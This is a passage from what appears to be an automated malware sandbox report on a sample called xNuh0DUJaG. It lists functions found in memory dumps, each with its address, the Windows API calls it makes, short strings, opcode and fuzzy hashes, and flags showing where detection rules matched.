                                                                                                                                                                                                                                        • Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                                                                                                                                                        • Instruction ID: b1a9c986a6c8a153888d36987e1bae779e1067417a18ba2696bd65e9dbf51bd0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B421B0715183908BD7089F79C964B6FFBE6BF86318F145A2CE1D287291DBB4C409CB82
                                                                                                                                                                                                                                        Function 00428280 Relevance: 2.6, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: :7$%$:7$%
                                                                                                                                                                                                                                        • API String ID: 0-2391988857
                                                                                                                                                                                                                                        • Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                                                                                                                                                        • Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82
                                                                                                                                                                                                                                        Function 0210AC99 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: MO$MO
                                                                                                                                                                                                                                        • API String ID: 0-3148518880
                                                                                                                                                                                                                                        • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                        • Instruction ID: f23d8909be9cac85cdd2bb68434d9148cd9c1c476272fef1fddd2926260da402
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F1197741843858BEF148FA89ED2667BFA0EF46220F249998DD855F38BC778C502CF64
                                                                                                                                                                                                                                        Function 02140694 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 7&'$$vA\
                                                                                                                                                                                                                                        • API String ID: 0-2621209329
                                                                                                                                                                                                                                        • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                                        • Instruction ID: f56a36cb5a2328df8591713326f5a73b0afb96c76a988bbf2a1fa24c884f6c9f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77F068345545944BDB958F3D98996BE67F0E757214F202AB5C65BE32A2CB31C4828F08
                                                                                                                                                                                                                                        Function 0044042D Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 7&'$$vA\
                                                                                                                                                                                                                                        • API String ID: 0-2621209329
                                                                                                                                                                                                                                        • Opcode ID: 6a4960e2c4cbeac596ca4eae9f8a78f72d17191a97ba87abbbd4385de96e26bd
                                                                                                                                                                                                                                        • Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a4960e2c4cbeac596ca4eae9f8a78f72d17191a97ba87abbbd4385de96e26bd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C
                                                                                                                                                                                                                                        Function 0041194F Relevance: 2.2, APIs: 1, Instructions: 666COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL ref: 00411D64
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 237503144-0
                                                                                                                                                                                                                                        • Opcode ID: 7cd814f07503108b401f8375ab37499eb4f108dc70f145f49585bda23ac5c5ec
                                                                                                                                                                                                                                        • Instruction ID: a8cfc5bf14821c73dd49e5f1522f5c4ec20a02328b59693b871348f0b0df5eb8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7cd814f07503108b401f8375ab37499eb4f108dc70f145f49585bda23ac5c5ec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4420A71A04B408FD714DF38D9813A6BBE1AF95314F188A3ED5EB8B3D2D639A446C706
                                                                                                                                                                                                                                        Function 0043CD27 Relevance: 2.0, Strings: 1, Instructions: 747COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: /p
                                                                                                                                                                                                                                        • API String ID: 0-62938030
                                                                                                                                                                                                                                        • Opcode ID: f05dc9b10545ef86860d8fcbb8867fd065d1046c62c590d4d0da79f29562f858
                                                                                                                                                                                                                                        • Instruction ID: ba8b9978e2f20e60afdbbdaba48a15688935c3ff76d45a9363d37c1b9ca99bef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f05dc9b10545ef86860d8fcbb8867fd065d1046c62c590d4d0da79f29562f858
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C32003AA18351CBD7049F39D81226BB7E1FF9A320F19887ED8C183291E779C955C786
                                                                                                                                                                                                                                        Function 02117AE4 Relevance: 1.8, APIs: 1, Instructions: 334COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02117E61
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 237503144-0
                                                                                                                                                                                                                                        • Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                                                                                                                                                        • Instruction ID: 17589f4ea65a266eae853b6b3a1ee5662cabae491b25076f3ba45119e7b70803
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8B1E0769487218BC314CF28C8917AAF7E2FFD9314F19962CE8C55B394E7389902C796
                                                                                                                                                                                                                                        Function 02117FFA Relevance: 1.8, APIs: 1, Instructions: 263COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 021182CF
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 237503144-0
                                                                                                                                                                                                                                        • Opcode ID: 63f8c36fe892800652800f2eb1c86de349cf38f6bbdc27b7255af2ab7d33a2e4
                                                                                                                                                                                                                                        • Instruction ID: 59256bea4e97f8b530b70924b0e6405a85f2aa0c37efa4375185d2b473f6e711
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63f8c36fe892800652800f2eb1c86de349cf38f6bbdc27b7255af2ab7d33a2e4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7791EF755083118BD728CF28C89176BB7E2FFC9314F1A8A6DE8C98B254E7389901CB46
                                                                                                                                                                                                                                        Function 02137DD0 Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2936123098-0
                                                                                                                                                                                                                                        • Opcode ID: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
                                                                                                                                                                                                                                        • Instruction ID: 2413e8a45b76275af843fbae4ebe63b6da0d3e4ed0179d58eae5af3504b7d30f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A991A3B5E002548FCB08CF6CC99179EBBF2AF89310F2982ADD855AB391D7759C01CB91
                                                                                                                                                                                                                                        Function 00437B69 Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2936123098-0
                                                                                                                                                                                                                                        • Opcode ID: 780105dc1da381acd2e1fd75bdd8727f1b567061e4b7cebbe5fd1d4054a1ec99
                                                                                                                                                                                                                                        • Instruction ID: c3200330e68ce6aff19a63fed1a4000c560c1f69ed3aeb6105e6dfa3e47a6751
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 780105dc1da381acd2e1fd75bdd8727f1b567061e4b7cebbe5fd1d4054a1ec99
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C91C3B1E042548FCB18CF6CC89179EBBF2AF89310F2982ADD855AB391D7759C01CB91
                                                                                                                                                                                                                                        Function 0213268D Relevance: 1.7, Strings: 1, Instructions: 458COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: J
                                                                                                                                                                                                                                        • API String ID: 0-1141589763
                                                                                                                                                                                                                                        • Opcode ID: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
                                                                                                                                                                                                                                        • Instruction ID: 26426caa0c57839ea2f1ab5318fc4b1838b9b70177cb3527e4af6a1c36e4ef1a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9127D75609AC18FE3158B38C991392BFE2AB66304F1CC9ADC4E9CB387D63AD506C751
                                                                                                                                                                                                                                        Function 00432426 Relevance: 1.7, Strings: 1, Instructions: 458COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: J
                                                                                                                                                                                                                                        • API String ID: 0-1141589763
                                                                                                                                                                                                                                        • Opcode ID: ead4b78866dd6fa033d6287702ef173ed587bb7cc98ce8c0654f759011b0a58d
                                                                                                                                                                                                                                        • Instruction ID: fda16036ad69fd6001319f3414ba3134900024cf57a0a68240a2308677c6b07d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ead4b78866dd6fa033d6287702ef173ed587bb7cc98ce8c0654f759011b0a58d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82127D71609AC18FE3158B38C591392BFE1AB66304F1CC9AEC4EACB387D63AD5068755
                                                                                                                                                                                                                                        Function 02137712 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2936123098-0
                                                                                                                                                                                                                                        • Opcode ID: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
                                                                                                                                                                                                                                        • Instruction ID: c991098d2942e1330a8ba3735ebbe51c6be24e551b09b5deec56a927cd917676
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC71B5B1E046508FC719CF6CC851359BFE2AB85314F2982ADD8999B3D2D7759806CB81
                                                                                                                                                                                                                                        Function 004374AB Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2936123098-0
                                                                                                                                                                                                                                        • Opcode ID: 39bfddd0d89d5aa851c5ebc283ebdd57ba84922f60a181c47f450d59d7061f13
                                                                                                                                                                                                                                        • Instruction ID: 45239876aaa66c970168bcac432cbab02119562676560ecae2c3189c67bbcca7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39bfddd0d89d5aa851c5ebc283ebdd57ba84922f60a181c47f450d59d7061f13
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6571C7B1E046508FC718CF6CC851359BFF2AB99314F2982ADD8999F3D2D6759C06CB81
                                                                                                                                                                                                                                        Function 02135F7A Relevance: 1.7, APIs: 1, Instructions: 189memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                                                                        • Opcode ID: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
                                                                                                                                                                                                                                        • Instruction ID: 8f7f33534c1155c82858add8b8e6177612938ff13f6db767dd12b5b71042ed13
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51912B11208BC28ED7268B3C88586157F925B67228B2D87DCD0FA8F7E7C7578107C366
                                                                                                                                                                                                                                        Function 00435D13 Relevance: 1.7, APIs: 1, Instructions: 189memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                                                                        • Opcode ID: aee65baa84eec6bad4cf93c4ab93b2d334002cbc985cabf08a2e562f31577c33
                                                                                                                                                                                                                                        • Instruction ID: f2a30e19a756ef2febaf58aa14edd62971e43cb539abc4116fa3d4166735a6c9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aee65baa84eec6bad4cf93c4ab93b2d334002cbc985cabf08a2e562f31577c33
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51913A21208BC28ED3268B3C88486157F915B67228F2C87DCE0FA8F7E7C6568107C366
                                                                                                                                                                                                                                        Function 021346A4 Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                                                                        • Opcode ID: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
                                                                                                                                                                                                                                        • Instruction ID: 2a6f63f53f274c2719391d736a44e2961b05b532b03c66aa236f66577199a951
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E912B21208BC28EC326CA3C88586557F921B67228B2D87DCD0FA8F7D7C7669107C766
                                                                                                                                                                                                                                        Function 0043443D Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                                                                        • Opcode ID: c3b337a8243762e24d3398e04d6e3e2f6a45ffd33d07df9af46c71bdbb35dbce
                                                                                                                                                                                                                                        • Instruction ID: 615ca32909d59e4e98a0e547278d02967b49bf7f3b148c397c41720c4b96474d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3b337a8243762e24d3398e04d6e3e2f6a45ffd33d07df9af46c71bdbb35dbce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB912C11208BC28EC326CA3C88586557F921BA7228F2D87DDD0FA8F7D7C7669507C766
                                                                                                                                                                                                                                        Function 021225E7 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: :;
                                                                                                                                                                                                                                        • API String ID: 0-3581617570
                                                                                                                                                                                                                                        • Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                                                                                                                                                        • Instruction ID: 3983290d6fd2335681fc544608f0b0aa6463c583f74d04b6e5b87d4475d88796
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EA1E572A883209BD7149F24CC817AF73E1EF81324F198528FC959B291E375ED59C752
                                                                                                                                                                                                                                        Function 00422380 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: :;
                                                                                                                                                                                                                                        • API String ID: 0-3581617570
                                                                                                                                                                                                                                        • Opcode ID: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                                                                                                                                                                                        • Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A
                                                                                                                                                                                                                                        Function 0213C807 Relevance: 1.6, Strings: 1, Instructions: 385COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: NP,?
                                                                                                                                                                                                                                        • API String ID: 0-3110377521
                                                                                                                                                                                                                                        • Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
